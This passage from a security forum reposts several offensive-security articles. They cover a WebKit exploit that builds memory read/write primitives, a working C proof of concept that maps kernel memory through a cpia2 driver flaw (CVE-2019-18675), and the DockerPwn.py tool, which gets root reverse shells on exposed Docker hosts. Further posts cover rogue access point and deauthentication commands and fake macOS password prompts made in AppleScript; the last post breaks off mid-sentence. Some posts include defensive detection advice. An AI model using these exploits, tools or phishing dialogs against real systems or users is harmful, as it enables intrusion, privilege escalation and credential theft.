The butterfly pointer points to the actual elements within the array. The values 1,2,3,4,6 are shown here starting with 0xffff as this is how integers are represented in memory as a JSValue. If we go back 0x10 bytes, we see the array length, which is 5. Some objects do not have a butterfly, so their pointer is null or 0 as shown below. Their properties will be stored inline as displayed. This script will help for double-to-memory-address conversion and vice versa. This was a short intro, but for more information and details on structures, butterflies, properties, boxing, unboxing and JS objects, check Saelo’s awesome article and talk. In addition to that, check out LiveOverflow's great series on WebKit. Let’s continue stepping through the breakpoint. All right, so, what is going on here? Note this part from the PoC: The mk_arr function creates an array with the first argument as its size and the second argument as its elements. The size is (0x20000000 + 0x40) / 8 = 0x4000008, which creates an array with size 0x4000008 and element values of 0x4141414141410000. The i2f function is for converting an integer to a float so that it ends up with the expected value in memory. LiveOverflow explains it well in his WebKit series. Given that, we now know that rcx points to object a’s butterfly - 0x10, because its size is at rcx + 8, which makes the butterfly rcx + 0x10. Going through the rest of this code, we see that r8, r10, rdi, r9, rbx, r12, and r13 all point to a copy of object a - eight copies to be specific - and edx keeps adding the sizes of each. Looking at edx, its value becomes 0x20000040. So, what are those eight a copies? And what is the value 0x20000040? Looking back at the PoC: This means f becomes: f creates an array by spreading NUM_SPREAD_ARGS (8) copies of the first argument and a single copy of its second argument. f is called with objects a (8 * 0x04000008) and c (length 1). When NewArrayWithSpread gets called, it makes room for those 8 a’s and 1 c. The last step through shows the length of object c, which makes the final edx value 0x20000041. The next step should be the allocation of that length, which happens inside emitAllocateButterfly(). We notice the overflow that occurs at shl r8d, 0x3, where 0x20000041 gets wrapped around to 0x208. The allocation size becomes 0x210 when it gets passed to emitAllocateVariableSized(). The out-of-bounds access violation we see happens in the following snippet on mov qword ptr [rcx + 8*rsi], r8. What this snippet does is iterate the newly created butterfly backwards with the incorrect size 0x20000041, while the real size is 0x210 after the overflow. 
It then zeros out each element, but since the actual size in memory is way smaller than 0x20000041, it reaches an out-of-bounds access violation in the ASAN build. The Primitives This might seem like just an integer overflow, but it is much more than that. When the allocation size wraps around, it becomes smaller than the initial value, thus enabling the creation of an undersized butterfly. This will trigger a heap overflow later when data gets written to it, so other arrays in its vicinity will get corrupted. We are planning on doing the following:
- Spray a bunch of arrays
- Write to bigarr in order to cause a heap overflow that will corrupt sprayed arrays
- Use corrupted arrays to achieve read (addrOf) / write (fake) to the heap using fake JS objects
The following snippet shows the spray. When f() is called, the integer overflow will trigger when creating a butterfly with length 0x20000041, thus producing an undersized one because of the wraparound. However, 0x20000041 elements will be written nonetheless, leading to a heap overflow. When c is accessed, the getter defined on its first element will fire and fill up the spray array with 0x4000 elements of newly created arrays from the slice() call. The large number of butterflies created in spray and the huge length of bigarr’s butterfly are bound to overlap at some point, because of the heap overflow and the fact that butterflies are created in the same memory space. After executing the POC in a non-ASAN release build, we get the following. We notice how the butterfly of one of spray’s objects (which are either spray_arr or spray_arr2) towards the end was overlapped by bigarr. The following might help in visualizing what is going on. It is important to note the types of spray_arr and spray_arr2 here, as they are necessary for constructing the exploit primitives. They are ArrayWithDouble and ArrayWithContiguous respectively. An array with type ArrayWithDouble contains non-boxed float values, which means an element is written and read as a native float number. ArrayWithContiguous is different, as it treats its elements as boxed JSValues, so it reads and writes JS objects. The basic idea is finding a way to write an object to the ArrayWithContiguous array (spray_arr2) and then read its memory address from the ArrayWithDouble array (spray_arr). The same is true vice versa, where we write a memory address to spray_arr and read it as an object using spray_arr2. In order to do that, we need to get hold of the overlapped space using the two arrays spray_arr and spray_arr2. Let us take a look at the following: This snippet loops over spray, specifically the ArrayWithDouble instances (spray_arr), and breaks when it finds the first overlapped space with bigarr, returning its index, oobarr_idx, in spray and a new object, oobarr, pointing to that space. The main condition to satisfy for breaking is the length check (> 0x40): when a sprayed array’s butterfly points into the bigarr data, which consists of 0x4142414141410000 values, its length field, located 8 bytes back, will also read as 0x4142414141410000. This makes the length 0x41410000, which is > 0x40. What is oobarr? It is an array of type ArrayWithDouble pointing to the beginning of the overlapped space between spray and bigarr. oobarr[0] should return 0x4142414141410000. The oobarr array is the first one we can use in order to read and write object addresses. contarr is an array of type ArrayWithContiguous pointing to a space that is shared with oobarr. 
The output below shows the snippet executed: The following shows both the addrOf and fake primitives. The addrOf primitive is used to return the address of any JS object by writing it to the ArrayWithContiguous array and reading it from the ArrayWithDouble array as a float. The fake primitive is the opposite. It is used to create a JS object from a memory address by writing the address to ArrayWithDouble and reading from ArrayWithContiguous. It is clear in the debugger output that both primitives work as expected. The next step is achieving arbitrary read/write by creating a fake object and controlling its butterfly. We know by now that objects store their data in the butterfly if it is not stored inline. This is what it looks like (from Filip Pizlo's talk): Check out the following: We create an empty array (length 0) with a single property, p0, containing a string. Its memory layout is shown below. When we go back 0x10 bytes from the butterfly, we see the quadwords for the length and the first property. Its vector length is 0, while the property points to 0x1034740a0. It should be clear by now that in order to access a property in an object, we get the butterfly and then subtract 0x10. What happens if we control the butterfly? Well, arbitrary read and write happens. For any JS object to be valid in memory, its JSCell must be valid as well, and that includes its structure ID. Structure IDs cannot be generated manually, but they are predictable, at least on the build we are working on. Since we are planning on creating a fake object, we need to make sure it has a valid JSCell. The following snippet sprays 0x400 objects so we can predict a value between 1 and 0x400 for its structure ID. We need to create a victim object that we control. Take a look at the following: mngr is the middle object in struct_spray, and we create victim making sure it resides in the address range after mngr’s address. We are going to use the outer object to create the fake object hax. The first property a is basically going to be the JSCell of the fake object. It will end up as 0x0108200700000200, which means 0x200 is the structure ID we predicted. The - (1<<16) part is just to account for the boxing effect (which adds 2^48) when that value is stored in the object. The b property will be the butterfly of the fake object. To create hax, we get the outer address and then add 0x10 to it. We then feed the result to the fake primitive that was created earlier. The object’s layout is shown in the lldb output below. When accessing an index of hax, it means we are accessing the memory space starting from mngr’s address, shown below. Since objects are located in the same space and victim was created last, it is located after mngr. Subtracting mngr_addr from victim_addr, we can reach victim’s JSCell and butterfly (+8) when indexing the result in hax. Let's achieve arbitrary read/write: As we mentioned previously, when accessing victim.p0, its butterfly is fetched and then we go backwards 0x10 in order to grab its first property. set_victim_addr sets victim’s butterfly to the value we provide plus 0x10. It is easier to look at it in the debugger. Looking at the dump above, we notice that originally, victim’s butterfly was 0x18014e8028. Later, it became 0x18003e4030, which is actually test’s address plus 0x18. When read64 is called, it is passed test’s address plus 8, since we are trying to read its butterfly. Within set_victim_addr, another 0x10 is added to the address. When victim.p0 is read, its butterfly 0x2042fc058 is fetched, then 0x10 is subtracted. 
This results in 0x2042fc048, which actually points to test's butterfly. victim.p0 actually fetches the value that is pointed to by the property address (0x18003e4030 in this case). Adding an addrOf() to that will get us the actual 0x18003e4030 value. Now we have achieved arbitrary read. Writing is similar, as shown in write64, where we write a value to victim.p0 using fake(). Neat, right? Conclusion I hope you have enjoyed this in-depth walkthrough. Bugs that come into the program through Pwn2Own tend to be some of the best we see, and this one is no exception. I also hope you learned a bit about lldb and walking through WebKit looking for bugs. If you find any, you know where to send them. 😀 You can find me on Twitter at @ziadrb, and follow the team for the latest in exploit techniques and security patches. Sursa: https://www.thezdi.com/blog/2019/11/25/diving-deep-into-a-pwn2own-winning-webkit-bug
  16. Kernel Research / mmap handler exploitation November 22, 2019 Description Recently I started to review the Linux kernel, and I've put a lot of time and effort into trying to identify vulnerabilities. I looked at the cpia2 driver, which is a V4L driver aimed at supporting cpia2 webcams (official documentation here). I found a vulnerability in the mmap handler implementation of the driver. Kernel drivers may re-implement their own mmap handlers, usually to speed up the process of exchanging data between user space and kernel space. The cpia2 driver re-implements an mmap handler for sharing the frame buffer with the user application which controls the camera. — Let's get into it Here is the userspace mmap function prototype (taken from man):
void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
Here the user supplies parameters for the mapping; we will be interested in the length and offset parameters.
length - will determine the length of the mapping
offset - will determine the offset from the beginning of the device we will start the mapping from.
The driver's specific mmap handler will remap kernel memory to userspace using a function like remap_pfn_range. CVE-2019-18675 Let's have a look at the cpia2 mmap handler implementation. We can see the file_operations struct:
/***
 * The v4l video device structure initialized for this device
 ***/
static const struct v4l2_file_operations cpia2_fops = {
	.owner = THIS_MODULE,
	.open = cpia2_open,
	.release = cpia2_close,
	.read = cpia2_v4l_read,
	.poll = cpia2_v4l_poll,
	.unlocked_ioctl = video_ioctl2,
	.mmap = cpia2_mmap,
};
Let's look at the function cpia2_mmap:
static int cpia2_mmap(struct file *file, struct vm_area_struct *area)
{
	struct camera_data *cam = video_drvdata(file);
	int retval;

	if (mutex_lock_interruptible(&cam->v4l2_lock))
		return -ERESTARTSYS;
	retval = cpia2_remap_buffer(cam, area);

	if(!retval)
		cam->stream_fh = file->private_data;
	mutex_unlock(&cam->v4l2_lock);
	return retval;
}
It just calls the function cpia2_remap_buffer() with a pointer to the camera_data struct:
/******************************************************************************
 *
 * cpia2_remap_buffer
 *
 *****************************************************************************/
int cpia2_remap_buffer(struct camera_data *cam, struct vm_area_struct *vma)
{
	const char *adr = (const char *)vma->vm_start;
	unsigned long size = vma->vm_end-vma->vm_start;
	unsigned long start_offset = vma->vm_pgoff << PAGE_SHIFT;
	unsigned long start = (unsigned long) adr;
	unsigned long page, pos;

	DBG("mmap offset:%ld size:%ld\n", start_offset, size);

	if (!video_is_registered(&cam->vdev))
		return -ENODEV;

	if (size > cam->frame_size*cam->num_frames ||
	    (start_offset % cam->frame_size) != 0 ||
	    (start_offset+size > cam->frame_size*cam->num_frames))
		return -EINVAL;

	pos = ((unsigned long) (cam->frame_buffer)) + start_offset;
	while (size > 0) {
		page = kvirt_to_pa(pos);
		if (remap_pfn_range(vma, start, page >> PAGE_SHIFT, PAGE_SIZE, PAGE_SHARED))
			return -EAGAIN;
		start += PAGE_SIZE;
		pos += PAGE_SIZE;
		if (size > PAGE_SIZE)
			size -= PAGE_SIZE;
		else
			size = 0;
	}
	cam->mmapped = true;
	return 0;
}
We can see that start_offset + size is being calculated, and the sum is being compared to the total size of the frames:
if(... 
|| (start_offset+size > cam->frame_size*cam->num_frames))
	return -EINVAL;
However, the calculation start_offset + size could wrap around to a low value (a.k.a. an integer overflow), allowing an attacker to bypass the check while still using a big start_offset value, which will lead to mapping of unintended kernel memory. The only requirement is that the start_offset value be a multiple of the frame_size (which can be controlled by the cpia2 driver options; by default it is 68k). And this can be quite bad, because a huge offset will allow us to perform a mapping at an arbitrary offset (outside of the frame buffer's bounds), and this can possibly result in a privilege escalation. Demo time! I've used a qemu kernel virtual machine (here). Now we have to:
Open /dev/video0
mmap a size of 0x11000 at offset 0xffffffffffff0000. The overflow will occur and we will pass the check.
Here is a minimalistic example of exploit code:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#define VIDEO_DEVICE "/dev/video0"

int main(){
	pid_t pid;
	char command[40];

	int fd = open(VIDEO_DEVICE , O_RDWR);
	if(fd < 0){
		printf("[-]Error opening device file\n");
	}

	printf("[+]Demonstration\n");
	pid = getpid();
	printf("[~]PID IS %d ", pid);
	getchar();

	int size = 0x11000;
	unsigned long mapStarter = 0x43434000;

	unsigned long * mapped = mmap((void *)mapStarter, size, PROT_WRITE | PROT_READ, MAP_SHARED , fd , 0xffffffffffff0000);
	if(mapped == MAP_FAILED)
		printf("[-]Error mapping the specified region\n");
	else
		puts("[+]mmap went successfully\n");

	/*view the /proc/<pid>/maps file */
	sprintf(command , "cat /proc/%d/maps", pid);
	system(command);

	return 0;
}
Compile and run: and B00M! We have got read and write primitives in kernel space! By modifying struct cred or kernel function pointers/variables we can possibly gain root, or destroy kernel data! Tips and thoughts Because I didn't have the required hardware (for example, an Intel QX5 microscope), I made some changes to the driver's code for this PoC. I changed the hardware- and USB-related parts in a way that allowed me to test the mmap functionality as it is in the original driver. Because the vulnerability is not related to the hardware interaction parts, this wasn't a problem. This way I could research more and even debug the interesting parts without depending on hardware. This vulnerability is more than 8 years old! This is my first public vulnerability! Additional info CVE-2019-18675 on NVD CVE-2019-18675 on Mitre Sursa: https://deshal3v.github.io/blog/kernel-research/mmap_exploitation
  17. DockerPwn.py Automation for abusing an exposed Docker TCP Socket. This will automatically create a container on the Docker host with the host's root filesystem mounted, allowing arbitrary read and write of the host filesystem (which is bad). Once created, the script will employ the method of your choosing for obtaining a root shell. All methods are now working properly, and will return a reverse shell. Chroot is the least disruptive, but Useradd is the default. Installation: It is recommended that you utilize the following for usage as opposed to static releases - Code in this repository may be updated frequently with minor improvements before releases are created. git clone https://github.com/AbsoZed/DockerPwn.py && cd DockerPwn.py Methods: All shell I/O is logged to './DockerPwn.log' for all methods. UserPwn: Creates a 'DockerPwn' user, and adds them to /etc/sudoers with NOPASSWD. The handler automatically escalates to root using this privilege, and spawns a PTY. ShadowPwn: Changes root and any valid user passwords to 'DockerPwn' in /etc/shadow, authenticates with Paramiko, and sends a reverse shell. The handler automatically escalates to root utilzing 'su', and spawns a PTY. ChrootPwn: Creates a shell.sh file which is a reverse shell, hosts on port 80. Downloads to /tmp, Utilizes chroot in docker container to execute shell in the context of the host, providing a container shell with interactivity to the host filesystem. Roadmap: SSL Support for :2376 Usage: DockerPwn.py [-h] [--target TARGET] [--port PORT] [--image IMAGE] [--method METHOD] [--c2 C2] optional arguments: -h, --help show this help message and exit --target TARGET IP of Docker Host --port PORT Docker API TCP Port --image IMAGE Docker image to use. Default is Alpine Linux. --method METHOD Method to use. Valid methods are shadowpwn, chrootpwn, userpwn. Default is userpwn. --c2 C2 Local IP and port in [IP]:[PORT] format to receive the shell. Sursa: https://github.com/AbsoZed/DockerPwn.py
  18. Modern Wireless Tradecraft Pt IV — Tradecraft and Defensive Strategy Gabriel Ryan Follow Nov 23 · 9 min read We’ve gone over a lot of information in the last three sections of this writeup. In case you missed them, you can find them here: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9 https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38 Now it’s time to make sense of it all, and talk about how each of the techniques we described fits into our toolkit from an operational perspective. Before we begin, we need to establish some important points from which we’ll build a frame of reference. The first of these is that wireless attacks are inherently risky, since they must be executed within line-of-sight distance to the target. Wireless attacks are a bit like motorcycles: they’re fun, they can be a fast way to get from point A to point B, but they do come with risks that must be managed in order to be used effectively. I’m pretty opinionated about this: I believe that because of the inherent risk, wireless tradecraft needs to be: Pragmatic: Focus should be placed on vetted techniques that are known to work reliably. Attacks should be prepared in advance instead of developed or prepared onsite. Disciplined: Attacks should be executed with deliberation against specific targets to achieve desired outcomes. Attacks should be supervised as they progress. “Spray and pray” tactics such as automatic deauthing should be avoided. Flexible: Techniques should be adjusted in realtime based on observed results. Impact Focused: Focus should be placed on attacks that reliably generate maximum impact in minimum time. Impact Focused Wireless Attacks The last point is particularly important. I do not believe that SSLStripping or Credential Sniffing are practices that belong in modern wireless playbooks for this reason. The widespread adoption of HSTS and Certificate Pinning means that using these techniques is largely a waste of time, and time is a valuable commodity that can lead to detection if not properly managed. With that out of the way, here are some situations in which I think that the use of wireless tradecraft can actually make sense: Breaching Wireless Networks: This is the obvious one. The end goal may be to gain access to an internal corporate network, or it may be something simpler like direct access to surveillance equipment, point-of-sale systems, or other networked hardware. Payload Delivery: APTs will phish under most circumstances, and you should too. However if phishing isn’t your thing or the situation calls for something different, rogue AP attacks can be a startlingly effective platform through which to deliver payloads to WiFi enabled devices. Once you’ve forced a device to connect to you, you gain the ability to act as either a captive portal or an internet gateway. As a captive portal, you can redirect users to pages that prompt them to install implants (aka “updates”), and restrict their Internet access until they comply. When acting as a network gateway, you can inject malicious code into static content (i.e. modify unencrypted JavaScript files in transit, etc). In both cases, you can restrict communication to endpoint protection servers, buying you time to complete the attack. 
AD Credential Theft: Many organizations tie their wireless infrastructure into Active Directory (AD). If these organizations use weak WPA/2-EAP configurations, the same attacks that you’d use to breach the wireless perimeter can also be effective tools for harvesting AD credentials. Until recently, it was even possible to use HTTP-to-SMB redirection to force Windows devices to surrender AD credentials, although this flaw seems to have been patched in Chrome and Edge within the past year (see: https://github.com/s0lst1c3/eaphammer/wiki/III.-Stealing-AD-Credentials-Using-Hostile-Portal-Attacks). For the sake of simplicity, let’s group these scenarios into the two overarching use-cases: Breaching Wireless Networks Targeting Client Devices In the sections that follow, we’ll examine the suitability of each of the techniques we’ve learned for these two specific purposes. Choosing a Rogue AP Technique Evil Twin Attacks Optimal Use-Case: Breaching Wireless Perimeter Evil Twin attacks are the primary means of attacking WPA/2-EAP networks, and can also be an effective means of attacking WPA/2-PSK networks. Breaching WPA/2-EAP networks involves using rogue AP attacks to exploit weak EAP configurations. This is a topic for which educational material is already widely available, so I’m not going to cover this in depth in this post. With that said, here’s a quick primer on the subject if you’re interested: http://solstice.sh/workshops/advanced-wireless-attacks/ii-attacking-and-gaining-entry-to-wpa2-eap-wireless-networks/ To attack a WPA/2-PSK network using an evil twin, you create a rogue access point with the same ESSID as the target and configure it to use WPA/2-PSK. You then capture the first two messages of the 4-way WPA handshake from any client that attempts to connect, and crack them to obtain the plaintext password. To perform this attack using EAPHammer, use the --creds flag in conjunction with the --auth wpa-psk flag:
./eaphammer -i wlan0 -e exampleCorp -c 1 --creds --auth wpa-psk
I should point out that this is not a new attack: it’s existed in hostapd-mana since January 2019 and in airbase-ng since dinosaurs roamed the earth. Secondary Use-Case: Targeting Client Devices Evil Twin attacks can be a good choice for targeting specific client devices if you have knowledge of at least one network on the device’s PNL. However, this approach can be dangerous. Evil Twins broadcast beacon frames by default, which prevents us from using MAC-based MFACLs to restrict the attack’s impact to specific devices. If the ESSID of the evil twin is target specific (i.e. you’re attacking EvilCorp and the ESSID of your rogue AP is something specific to EvilCorp’s infrastructure), then you’re probably ok. But if your rogue AP has a fairly common ESSID such as “attwifi”, you stand a high chance of causing collateral damage. Using EAPHammer’s --cloaking full flag can mitigate a lot of this risk, because it will cause your AP to rely exclusively on broadcast probe responses to force targets to connect.
./eaphammer -i wlan0 -e exampleCorp -c 1 --hostile-portal --cloaking full --auth owe
However, cloaked evil twin attacks can be stopped using many of the same countermeasures that are used to stop classic karma attacks, so this may not be the best approach. Opsec Considerations Savvy network defenders often whitelist their access points by BSSID. 
As an attacker, you can circumvent these restrictions by spoofing the BSSID of a whitelisted AP (make sure to choose one that is a considerable distance away to avoid BSS conflicts). You should try to match the capabilities of the target access point though, since failure to do so will make your rogue AP stick out like a sore thumb. MANA (and loud MANA) Attacks Optimal Use-Case: Targeting Client Devices MANA (and all karma-style attacks, for that matter) are mainly designed for situations in which you need to target a client device but do not know the device’s PNL. They are also ideal for targeting specific devices, since they can be controlled using MAC-based MFACLs (unlike Evil Twins, which rely primarily on beacon frames). Secondary Use-Case: Breaching Wireless Perimeter If the goal of the attack is to steal credentials for a WPA network, an evil twin is generally a better choice. However, it can make sense to use MANA attacks to breach WPA/2-PSK and WPA/2-EAP networks when Wireless Intrusion Prevention Systems (WIPS) are present. MANA attacks can be used to execute a quieter version of the traditional evil twin attack. To do this, begin by creating an ESSID whitelist file containing the ESSID of the target access point:
echo exampleCorp > target-ess.txt
Next, create a MAC address whitelist file containing the MAC addresses of our targets:
echo 00:CB:19:D1:DD:B2 > mac-whitelist.txt
echo A3:A5:9A:A9:B3:A4 >> mac-whitelist.txt
echo FE:47:F2:7B:69:5C >> mac-whitelist.txt
echo C0:AF:A8:23:8D:7E >> mac-whitelist.txt
echo 33:58:A1:6E:A4:5F >> mac-whitelist.txt
echo C1:62:2A:5D:F8:80 >> mac-whitelist.txt
Next, create a rogue AP with the following configuration:
cloaking enabled
ESSID of target network
802.11w enabled (but not required) to prevent deauths from WIPS
MAC-based MFACL to restrict probe responses to specific devices
ESSID-based MFACL to restrict probe responses to target network
auth set to either WPA-PSK or WPA-EAP (depending on target network configuration)
./eaphammer -i wlan0 \
	-e exampleCorp \
	--pmf enable \
	--cloaking full \
	--mana \
	--auth wpa-eap \
	--creds \
	--mac-whitelist mac-whitelist.txt \
	--ssid-whitelist target-ess.txt
Optional: deauthenticate client devices to coerce them to roam to the new AP:
for i in `cat mac-whitelist.txt`; do aireplay-ng -0 5 -a de:ad:be:ef:13:37 -c $i; done
The rogue AP will stay “dormant” (not advertise its presence) until it receives probe requests from the target device(s), at which point it will respond in an attempt to trick the targets into associating. Opsec Considerations All karma-style attacks (including MANA) create an easily detectable one-to-many relationship between a single BSSID and multiple ESSIDs. See the section on detection strategies for more information. Known Beacon Attacks Optimal Use-Case: Targeting Client Devices Known Beacon attacks make sense in situations where you do not know the target devices’ PNL and where MANA attacks fail. Opsec Considerations Known beacon attacks are extremely loud due to the one-to-many relationship they create between a single BSSID and numerous ESSIDs. They also have a high potential for collateral damage. MAC-based MFACLs can limit this collateral damage to some extent — devices will still attempt to connect to your rogue AP, even though they won’t be able to complete the association process. Depending on the rogue AP’s transmission rate and the number of spoofed ESSIDs in use, known beacon attacks can cause network congestion. 
Detection Strategies Rogue AP detection is a pretty expansive topic, so this won’t be an exhaustive writeup. I do plan on writing at least one dedicated post on this subject in the future though, most likely geared towards Kibana and Wifibeat. With that out of the way, here’s a list of fundamental indicators that any Wireless Intrusion Prevention System (WIPS) should monitor for: 1. New ESSIDs It’s unusual to see new ESSs appear out of nowhere. Although the presence of a new ESS is not an indicator by itself, it does warrant additional investigation. 2. Legacy versions of 802.11 Most modern networking hardware uses 802.11ac, although it’s not uncommon to see 802.11n deployed in production as well. On the other hand, the vast majority of wireless pentesting hardware is limited to 802.11n and earlier. Unless adversaries are particularly aware of what they’re doing, they are likely to use an external wireless interface that is limited to 802.11g or 802.11a. If you suddenly see a new ESS appear operating in 802.11g/a mode, that’s a pretty good indication that you should take a closer look. 3. Uncommon OUIs The first three octets of any device’s MAC address contain an Organizationally Unique Identifier (OUI) that is used to uniquely identify the device’s manufacturer. Most rogue AP attacks are executed using external hardware made by manufacturers such as Alfa, TP-Link, and Panda Wireless. As such, it’s typically a good idea to monitor for devices that have OUIs from these types of manufacturers. 4. ESSID Whitelist Violations Keep an inventory of BSSIDs in your network, and use it as a whitelist. If you see an access point that is using your ESSID but is not in your whitelist, that is a strong indication that your network is being attacked. 5. One-to-many relationships A single BSSID should never map to more than one ESSID. The presence of multiple beacon packets or probe response packets for multiple ESSIDs originating from a single BSSID is a strong indicator of malicious activity. 6. Known default settings for rogue AP attack tools Most publicly available tools for performing rogue AP attacks (including the WiFi Pineapple and EAPHammer) have easily identifiable default settings. For example, both EAPHammer and the WiFi Pineapple have a default BSSID of either 00:11:22:33:44:00 or 00:11:22:33:44:55. Additionally, EAPHammer has a default ESSID of eaphammer, which is still present during karma / MANA attacks unless manually specified by the user. These defaults are basically built-in “skid” filters that were, at least in the case of EAPHammer, deliberately included to make irresponsible use easier to detect. Conclusion This concludes our primer series Modern Wireless Tradecraft. Written by Gabriel Ryan Sursa: https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d
  19. macOS Red Team: Spoofing Privileged Helpers (and Others) to Gain Root By Phil Stokes - November 25, 2019 As we saw in previous posts, macOS privilege escalation typically occurs by manipulating the user rather than exploiting zero days or unpatched vulnerabilities. Looking at it from the perspective of a red team engagement, one native tool that can be useful in this regard is AppleScript, which has the ability to quickly and easily produce fake authorization requests that can appear quite convincing to the user. Although this in itself is not a new technique, in this post I will explore some novel ways we can (ab)use the abilities of AppleScript to spoof privileged processes the user already trusts on the local system. What is a Privileged Helper Tool? Most applications on a Mac don’t require elevated privileges to do their work, and indeed, if the application is sourced from Apple’s App Store, they are – at least technically – not allowed to do so. Despite that, there are times when apps have quite legitimate reasons for needing privileges greater than those possessed by the currently logged in user. Here’s a short list, from Apple’s own documentation:
manipulating file permissions, ownership
creating, reading, updating, or deleting files
opening privileged ports for TCP and UDP connections
opening raw sockets
managing processes
reading the contents of virtual memory
changing system settings
loading kernel extensions
Often, programs that need to perform any of these functions only need to do so occasionally, and in that context it makes sense to simply ask the user for authorization at the time. While this may improve security, it is also not the most convenient if the program in question is going to need to perform one or more of these actions more than once in any particular session. Users are not fond of repeated dialog alerts or of repeatedly having to type in a password just to get things done. Privilege separation is a technique that developers can use to solve this problem. By creating a separate “helper program” with limited functionality to carry out these tasks, the user need only be asked at install time for permission to install the helper tool. You’ve likely seen permission requests that look something like this: The helper tool always runs with elevated privileges, but it is coded with limited functionality. At least in theory, the tool can only perform specific tasks and only at the behest of the parent program. These privileged helper tools live in a folder in the local domain Library folder: /Library/PrivilegedHelperTools Since they are only installed by 3rd party programs sourced from outside of the App Store, you may or may not have some installed on a given system. However, some very popular and widespread macOS software either does or has made use of such tools. Since orphaned Privileged Helper Tools are not removed by the OS itself, there’s a reasonable chance that you’ll find some of these in use if you’re engaging with an organisation with Mac power users. Here’s a few from my own system that use Privileged Helper Tools:
BBEdit
Carbon Copy Cloner
Pacifist
Abuses of this trust mechanism between parent process and privileged helper tool are possible (CVE-2019-13013), but that’s not the route we’re going to take today. Rather, we’re going to exploit the fact that there’s a high chance the user will be familiar with the parent apps of these privileged processes and inherently trust requests for authorization that appear to be coming from them. 
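If you want a quick look at what is installed on a test machine before following along, the same enumeration the post builds in AppleScript below can also be sketched in JXA (JavaScript for Automation), run with osascript -l JavaScript — purely an illustrative aside, not part of the original walkthrough:

// JXA sketch: list the contents of /Library/PrivilegedHelperTools
ObjC.import('Foundation');

var fm = $.NSFileManager.defaultManager;
var err = Ref();
var items = ObjC.deepUnwrap(
    fm.contentsOfDirectoryAtPathError('/Library/PrivilegedHelperTools', err)
) || [];

items.forEach(function (name) {
    console.log(name);
});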
Why Use AppleScript for Spoofing? Effective social engineering is all about context. Of course, we could just throw a fake user alert at any time, but to make it more effective, we want to:
Make it look as authentic as possible – that means using an alert with convincing text, an appropriate title and preferably a relevant icon
Trigger it for a convincing reason – apps that have no business or history of asking for privileges are going to raise more suspicion than those that do. Hence, Privileged Helper tools are useful candidates to target, particularly if we provide enough authentic details to pass user scrutiny.
Trigger it at an appropriate time, such as when the user is currently using the app that we’re attempting to spoof.
All of these tasks are easy to accomplish and combine using AppleScript. Here’s an example of the sort of thing we could create using a bit of AppleScripting. The actual dialog box is fairly crude. We haven’t got two fields for input for both user name and password, for one thing (although as we’ll see in Part 2 that is possible), but even so this dialog box has a lot going for it. It contains a title, an icon and the name of a process that, if the user were to look it up online, would lead them back to the Privileged Helper tool that they can verify exists in their own /Library/PrivilegedHelperTools folder. The user would have to dig quite a bit deeper in order to actually discover our fraud. Of course, a suspicious user might just press “Cancel” instead of doing any digging at all. Fortunately, using AppleScript means we can simultaneously make our request look more convincing and discourage our target from doing that again by wiring up the “Cancel” button to code that will either kill the parent app or simply cause an infinite repeat. An infinite repeat might raise too many suspicions, however; killing the app and throwing a suitable alert “explaining” why this just happened could look far more legitimate. When the user relaunches the parent app and we trigger our authorization request again, the user is now far more likely to throw in the password and get on with their work. For good measure, we can also reject the user’s first attempt to type the password and make them type it twice. Since what is typed isn’t shown back to the user, making typos on password entry is a common experience. Forcing double entry (and capturing the input both times) should ensure that if the first attempt contained a typo or was not correct, the second one should be (we could also attempt to verify the user’s password directly before accepting it, but I shall leave such details aside here as we’ve already got quite a lot of work to get through!). Creating the Spoofing Script If you are unfamiliar with AppleScript or haven’t looked at how it has progressed in recent years since Yosemite 10.10, you might be surprised to learn that you can embed Objective-C code in scripts and call Cocoa and Foundation APIs directly. That means we have all the power of native APIs like NSFileManager, NSWorkspace, NSString, NSArray and many others. In the examples below, I am using a commercial AppleScript editor, which is also available in a free version and which is far more effective as an AppleScript development environment than the unhelpful built-in Script Editor app. As with any other scripting or programming language, we need to "import" the frameworks that we want to use, which we do in AppleScript with the use keyword. 
Let’s put the following at the top of our script: These act as both shortcuts and a bridge to the AppleScript-Objective C scripting bridge and make the named APIs accessible in a convenient manner, as we’ll see below. Next, let’s write a couple of “handlers” (functions) to enumerate the PrivilegedHelper tools directory. In the image below, the left side shows the handler we will write; on the right side is an example of what it returns on my machine. As we can see, this handler is just a wrapper for another handler enumerateFolderContents:, which was borrowed from a community forum. Let’s take a look at the code for that, which is a bit more complex: # adapted from a script by Christopher Stone on enumerateFolderContents:aFolderPath set folderItemList to "" as text set nsPath to current application's NSString's stringWithString:aFolderPath --- Expand Tilde & Symlinks (if any exist) --- set nsPath to nsPath's stringByResolvingSymlinksInPath() --- Get the NSURL --- set folderNSURL to current application's |NSURL|'s fileURLWithPath:nsPath set theURLs to (NSFileManager's defaultManager()'s enumeratorAtURL:folderNSURL includingPropertiesForKeys:{} options:((its NSDirectoryEnumerationSkipsPackageDescendants) + (get its NSDirectoryEnumerationSkipsHiddenFiles)) errorHandler:(missing value))'s allObjects() set AppleScript's text item delimiters to linefeed try set folderItemList to ((theURLs's valueForKey:"path") as list) as text end try return folderItemList end enumerateFolderContents: Now that we have our list of Privileged Helper Tools, we will want to grab the file names separately from the path as we will use these names in our message text to boost our credibility. In addition, we want to find the parent app from the Helper tool’s binary both so that we can show this to the user and because we will also need it to find the app’s icon. This is how we do the first task, again with the code on the left and example output shown on the right: Now that we have our targets, all that remains is to find the parent apps. For that, we’ll borrow and adapt from Erik Berglund’s script here. In this example, we can see the parent application’s bundle identifier is “com.barebones.bbedit”. There are a number of ways we can extract the identifier substring from the string, such as using command line utils like awk (as Erik does), or using cut to slice fields, but I’ll stick to Cocoa APIs for both the sake of speed and to avoid unnecessarily spawning more processes. Be aware with whatever technique you use, the identifier does not always occur in the same position and may not begin with “com”. In all cases that I’m aware of, though, it does follow immediately after the keyword “identifier”, so I’m going to use that as my primary delimiter. Do ensure your code accounts for edge cases (I’ll omit error checking here for want of space). In the code above, I use Cocoa APIs to first split the string around either side of the delimiter. That should leave me with the actual 